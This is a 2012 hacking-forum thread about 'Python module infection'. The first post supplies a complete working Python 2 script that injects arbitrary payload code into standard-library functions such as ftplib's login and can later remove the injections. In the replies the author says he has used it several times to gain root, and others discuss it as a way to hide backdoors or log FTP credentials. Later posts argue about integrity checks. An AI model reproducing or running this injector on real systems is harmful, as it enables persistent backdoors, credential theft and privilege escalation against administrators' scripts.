Author Topic: [Python] Python Module Infection  (Read 1859 times)

0 Members and 2 Guests are viewing this topic.

Offline Zer0Flag

  • Serf
  • *
  • Posts: 20
  • Cookies: 5
    • View Profile
[Python] Python Module Infection
« on: June 20, 2012, 08:49:58 pm »
Hello,
 
 I recognized that you can modify default python modules like the "ftplib" and there are no checks if the module got modified and through that you can inject code which gets executed by all scripts which use the modified function. For example this could be used to execute code with admin rights even if your user doesn´t have this rights. Or to log FTP connections ( user , passwd , host , port... ) and a lot more. I didn´t found something about this issue on google and I don´t know if this is a known issue.
 
 I created a small script which helps to inject your code for testing purposes.
Code: [Select]
#!/usr/bin/python
#
# Coder   : Zer0Flag
# Date    : 18.06.2012
# Contact : zer0fl4g@googlemail.com
#
# Usage   : PyRTInfect.py -l <file you want inject into> -f <function you want inject into> -c <file you want to inject>
#           PyRTInfect.py -l <file you want to clean>
#
# Example : PyRTInfect.py -l C:\Python2.7\Lib\ftplib.py -f login -c C:\MyEvilPayload.py
#           PyRTInfect.py -l /usr/lib/python2.6/ftplib.py -f login -c /home/MyEvilPayload.py
#
# Tested  : Windows XP SP3 @ Python 2.7
#           Windows 7 SP1 @ Python 2.7
#           BackTrack 5 @ Python 2.6
#

import sys

def PrintUsage():
    print 'Usage:\n\t%s -l <file> -f <function> -c <file.to.inject>' % sys.argv[0]
    print '\t%s -l <file>\t#Clear all Injections' % sys.argv[0]
       
def InjectIntoRT(sFileToInfect,sFunctionToInfect,sFileToInject):
    if len(sFileToInfect) != 0 and len(sFunctionToInfect) != 0 and len(sFileToInject) != 0:
        sFTI = open(sFileToInfect,'r+')
        sFTIn = open(sFileToInject,'r+')
       
        bGoOn = True
        bWriteData = True
        iLineCounter = 0
        IWCount = 0
        sBackUpTFI = sFTI.readlines()
        sFTI.seek(0)
       
        while bGoOn:
            iLineCounter += 1
            sLine = sFTI.readline()
            if str(sLine).__contains__('def ' + sFunctionToInfect):
                print '[+] Function: \"%s\" found at %d' % (sFunctionToInfect,iLineCounter)
                print '[+] Going to Inject following lines!\n'
                sLinesToInject = sFTIn.readlines()
                for sLTI in sLinesToInject:
                    print sLTI
                   
                sFTI.seek(0)
                while bWriteData:
                    try:
                        sFTI.write(sBackUpTFI[IWCount])
                        if IWCount == iLineCounter:
                            sFTI.write('\t#1:Injected\n')
                            sFTI.writelines(sLinesToInject)
                            sFTI.write('\n\t#2:Injected\n')
                        IWCount += 1
                    except IndexError,e:
                        bWriteData = False
                bGoOn = False
       
        sFTI.close()
        sFTIn.close()
    else:
        return 0
    return 1

def ClearRTFile(sFileName):
    fRTFile = open(sFileName,'r+')
    fBackUp = fRTFile.readlines()
    fRTFile.seek(0)
    bWriteOk = True
    iCounter = 0
   
    for sLine in fBackUp:
        if str(sLine).__contains__('#1:Injected'):
            bWriteOk = False
            print '[+] Injected Line Found at %d' % iCounter
        elif str(sLine).__contains__('#2:Injected'):
            bWriteOk = True
            continue
           
        if bWriteOk:
            fRTFile.write(sLine)
        iCounter += 1
    return 1

if __name__ == "__main__":
    if len(sys.argv) < 3:
        PrintUsage()
    elif len(sys.argv) == 3:
        for i in range(0,len(sys.argv)):
            if sys.argv[i] == '-l':
                ClearRTFile(sys.argv[i + 1])               
    elif len(sys.argv) == 7:
        for i in range(0,len(sys.argv)):
            if sys.argv[i] == '-l':
                sFileToInfect = sys.argv[i + 1]
            elif sys.argv[i] == '-f':
                sFunctionToInfect = sys.argv[i + 1]
            elif sys.argv[i] == '-c':
                sFileToInject = sys.argv[i + 1]
               
        if InjectIntoRT(sFileToInfect,sFunctionToInfect,sFileToInject) == 0:
            PrintUsage()


~Zer0

Offline flowjob

  • Knight
  • **
  • Posts: 327
  • Cookies: 46
  • Pastafarian
    • View Profile
Re: [Python] Python Module Infection
« Reply #1 on: June 20, 2012, 10:02:44 pm »
This is not really a security leak,as you only change the code on your local computer.
So e.g. you would only log the ftp data you entered on your computer..

Sometimes you may want to change a few lines of the org libs too,because something doesn't work...
Quote
<phil> I'm gonna DDOS the washing machine with clothes packets.
<deviant_sheep> dont use too much soap or youll cause a bubble overflow

Offline Zer0Flag

  • Serf
  • *
  • Posts: 20
  • Cookies: 5
    • View Profile
Re: [Python] Python Module Infection
« Reply #2 on: June 20, 2012, 10:12:42 pm »
Well but e.g. when you got access to a root and you see that the admin uses a backup python script you could inject into the used functions and got your code executed with root rights. So I think this is a fail from python to not check if the local libs got modified or not. A little crc check when the libs get imported and a warning to the user that he should be careful would be nice and easy to implement...

~Zer0

Offline Kulverstukas

  • Administrator
  • Zeus
  • *
  • Posts: 6627
  • Cookies: 542
  • Fascist dictator
    • View Profile
    • My blog
Re: [Python] Python Module Infection
« Reply #3 on: June 20, 2012, 11:05:16 pm »
but the crc check could be passed just as easily... all checksums would have to be stored somewhere in order to compare them. You could then generate your own checksums and just replace them.
Using online checks is kinda not an option in here because it would generate unwanted traffic. Also checking integrity of those libs on each start would really decrease the speed. Imagine if some user has thousands of those libs...

Offline Zer0Flag

  • Serf
  • *
  • Posts: 20
  • Cookies: 5
    • View Profile
Re: [Python] Python Module Infection
« Reply #4 on: June 21, 2012, 12:06:46 am »
I didn´t say that crc checks would be the ultimate protection also there is always a way to bypass the checks. But just as it is its dangerous to use py scripts on your roots... ( And No I don´t have something against py! I love it! )

~Zer0

Offline LeXeL

  • /dev/null
  • *
  • Posts: 12
  • Cookies: 1
    • View Profile
Re: [Python] Python Module Infection
« Reply #5 on: July 06, 2012, 03:45:23 pm »
also if the application is already running? I mean you will need to reload the aplication to import again the lib and the code get's executed...

Offline Zer0Flag

  • Serf
  • *
  • Posts: 20
  • Cookies: 5
    • View Profile
Re: [Python] Python Module Infection
« Reply #6 on: July 06, 2012, 11:40:35 pm »
sure they need to be reloaded to import the infected module. But just think about a backup script in .py which stores the .tar.gz on a ftp... and the scripts needs to be executed with admin rights to access all folders which needs to be saved...

Sure that are a lot of conditions which needs to be true for a successful attack but I already used this several times to get root access on a box and I think its very dangerous.

~Zer0Flag

Offline Kulverstukas

  • Administrator
  • Zeus
  • *
  • Posts: 6627
  • Cookies: 542
  • Fascist dictator
    • View Profile
    • My blog
Re: [Python] Python Module Infection
« Reply #7 on: July 07, 2012, 08:14:48 am »
It might be dangerous, but only with the right conditions. Therefore it degrades to "don't care" for a general rating.

Offline LeXeL

  • /dev/null
  • *
  • Posts: 12
  • Cookies: 1
    • View Profile
Re: [Python] Python Module Infection
« Reply #8 on: July 07, 2012, 05:41:20 pm »
I thought of this long time ago as a way to hide backdoors on a system good job ... but what happend if the user update python? Or the hall system
« Last Edit: July 07, 2012, 05:42:50 pm by LeXeL »

Offline techb

  • Soy Sauce Feeler
  • Global Moderator
  • King
  • *
  • Posts: 2350
  • Cookies: 345
  • Aliens do in fact wear hats.
    • View Profile
    • github
Re: [Python] Python Module Infection
« Reply #9 on: July 09, 2012, 03:51:24 am »
I thought of this long time ago as a way to hide backdoors on a system good job ... but what happend if the user update python? Or the hall system


Most people are still using Python 2.* because there isn't a whole lot of third party support for 3.


The idea is almost good, but Python (even though popular), PHP is used a lot more and would be better to infect something like PHP.


Interpreted things aren't really a good target though.
>>>import this
-----------------------------